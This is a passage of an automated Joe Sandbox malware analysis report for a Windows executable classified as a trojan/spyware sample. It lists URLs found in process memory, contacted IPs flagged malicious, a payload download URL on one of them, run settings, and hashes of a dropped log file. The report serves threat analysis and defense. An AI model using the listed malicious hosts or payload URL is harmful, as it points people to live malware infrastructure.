                                https://duckduckgo.com/ac/?q=mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmpfalse
                                  high
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinarymixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                    high
                                    http://tempuri.org/Entity/Id12Responsemixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://tempuri.org/mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://tempuri.org/Entity/Id2Responsemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                      high
                                      http://tempuri.org/Entity/Id21Responsemixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id9mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id8mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://tempuri.org/Entity/Id5mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Preparemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id4mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://tempuri.org/Entity/Id7mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://tempuri.org/Entity/Id6mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                              high
                                              https://support.google.com/chrome/?p=plugin_realmixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                high
                                                http://tempuri.org/Entity/Id19Responsemixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultlmixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.interoperabilitybridges.com/wmp-extension-for-chromemixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencemixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://185.112.83.8/Allocation.binwqmixfive_20211216-221155.exe, 0000000C.00000002.1001581740.00000000009D8000.00000004.00000020.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://support.google.com/chrome/?p=plugin_pdfmixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsatmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeymixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/Entity/Id15Responsemixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://forms.real.com/real/realone/download.html?type=rpsp_usmixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://support.amixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registermixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Entity/Id6Responsemixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005631729.000000001E7BC000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeymixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://api.ip.sb/ipmixfive_20211216-221155.exe, 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006896564.0000000020B60000.00000004.00020000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exemixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://support.google.com/chrome/?p=plugin_quicktimemixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/04/scmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://tempuri.org/Entity/Id9Responsemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://tempuri.org/Entity/Id20mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://tempuri.org/Entity/Id21mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://tempuri.org/Entity/Id22mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://tempuri.org/Entity/Id23mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://nsis.sf.net/NSIS_ErrorErrormixfive_20211216-221155.exefalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://tempuri.org/Entity/Id24mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issuemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://tempuri.org/Entity/Id24Responsemixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://tempuri.org/Entity/Id1Responsemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedmixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlymixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Replaymixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegomixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binarymixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeymixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingmixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://support.google.com/chrome/?p=plugin_shockwavemixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://forms.reamixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id10mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id11mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id12mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id16Responsemixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id13mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id14mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id15mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id16mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Noncemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/Entity/Id17mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id18mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id5Responsemixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id19mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsmixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tempuri.org/Entity/Id10Responsemixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Renewmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://tempuri.org/Entity/Id8Responsemixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://support.google.com/chrome/?p=plugin_wmpmixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeymixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://support.google.com/chrome/answer/6258784mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                                                                                                                                            high

                                                                                                                                            Contacted IPs

                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs

                                                                                                                                            Public

                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            185.112.83.8
                                                                                                                                            unknownRussian Federation
                                                                                                                                            50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                            194.26.229.202
                                                                                                                                            unknownNetherlands
                                                                                                                                            1213HEANETIEtrue

                                                                                                                                            General Information

                                                                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                            Analysis ID:541451
                                                                                                                                            Start date:17.12.2021
                                                                                                                                            Start time:10:14:52
                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 8m 26s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:light
                                                                                                                                            Sample file name:mixfive_20211216-221155 (renamed file extension from none to exe)
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                            Number of analysed new started processes analysed:18
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • HDC enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@3/4@0/2
                                                                                                                                            EGA Information:Failed
                                                                                                                                            HDC Information:
                                                                                                                                            • Successful, ratio: 24.8% (good quality ratio 24.3%)
                                                                                                                                            • Quality average: 88.3%
                                                                                                                                            • Quality standard deviation: 21%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 83%
                                                                                                                                            • Number of executed functions: 0
                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Adjust boot time
                                                                                                                                            • Enable AMSI
                                                                                                                                            • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                                                                            • Stop behavior analysis, all processes terminated
                                                                                                                                            Warnings:
                                                                                                                                            Show All
                                                                                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 23.54.113.53
                                                                                                                                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                            Simulations

                                                                                                                                            Behavior and APIs

                                                                                                                                            TimeTypeDescription
                                                                                                                                            10:18:23API Interceptor20x Sleep call for process: mixfive_20211216-221155.exe modified

                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                            IPs

                                                                                                                                            No context

                                                                                                                                            Domains

                                                                                                                                            No context

                                                                                                                                            ASN

                                                                                                                                            No context

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            No context

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mixfive_20211216-221155.exe.log
                                                                                                                                            Process:C:\Users\user\Desktop\mixfive_20211216-221155.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2291
                                                                                                                                            Entropy (8bit):5.3192079301865585
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:MIHKmfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHK1HxLHG1qHqH5HX:Pqaq5qXAqLqdqUqzcGYqhQnoPtIxHbqG
                                                                                                                                            MD5:2308F672881D77B53310A221B4D27E95
                                                                                                                                            SHA1:80371C7B5D415DC46F2BB4BA872B14AF0B0EED8B
                                                                                                                                            SHA-256:83D6F5E305A78D3EAB05CFB58D8595FECB2755E80978C6D6236AEF9186E65CDB
                                                                                                                                            SHA-512:ECFBCDFAA24CEE02DFAD3175043FF4408F100E0867A66AE3AF14C2C7CB572E451C052A4D5FA452F6FB5C732C082DA7AB321F58CF65E37862E777EEF4DADDC652
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
